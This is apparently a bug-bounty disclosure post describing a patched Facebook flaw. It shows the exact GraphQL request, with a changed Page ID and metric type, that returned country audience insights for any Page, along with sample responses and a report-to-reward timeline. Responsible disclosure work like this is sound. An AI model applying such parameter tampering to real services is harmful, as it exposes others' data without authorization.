Wednesday, April 7, 2021

Facebook Bug POC - Fetching Demographic Audience data Insight for any Page

There was a GraphQl request which could be malformed to get the Demographic Audience data insight for any Facebook Page.

Demographic Audience data insight - Country (specific in this bug)likes insight.

Ex - 20% or xxxx number of the Page Audience is from a specific country.

The request went to -

POST /api/graphql/
Host: business.facebook.com

variables={"input":{"breakdowns":["COUNTRY"],"event":"LIKE","id":"(TARGET_PAGE_ID)","time_range":{"type":"LIFETIME"},"tofu_metric":"PERCENT"}}&doc_id=2678024672210272

Changing the TARGET_PAGE_ID to the target Page's ID, the response would look like -

{"data":{"tofu_metrics_query":{"status":"SUCCESS","__typename":"TofuSingleValueWithBreakdownMetricsQueryResult","breakdowns":["COUNTRY"],"bucket_values":[{"bucket_names":["India"],"bucket_value":42.6},{"bucket_names":["Pakistan"],"bucket_value":8.1},{"bucket_names":["Bangladesh"],"bucket_value":4.8},{"bucket_names":["Sri Lanka"],"bucket_value":4.7},{"bucket_names":["Egypt"],"bucket_value":2.8

By changing the "PERCENT" object to "UNIQUE_USERS" in the original request, we will get a response with number matrix instead of percentage. Which looks like -

"bucket_names":["India"],"bucket_value":1473},{"bucket_names":["Pakistan"],"bucket_value":281},{"bucket_names":["Bangladesh"],"bucket_value":165},{"bucket_names":["Sri Lanka"],"bucket_value":164},{"bucket_names":["Egypt"],"bucket_value":98},{"bucket_names":["Nepal"],"bucket_value":93

Timeline -

20 October 2020  - Reported the issue.
3 November 2020  - Triaged.

9 December 2020  - Fix and my confirmation for fix.
11 December 2020 - Rewarded.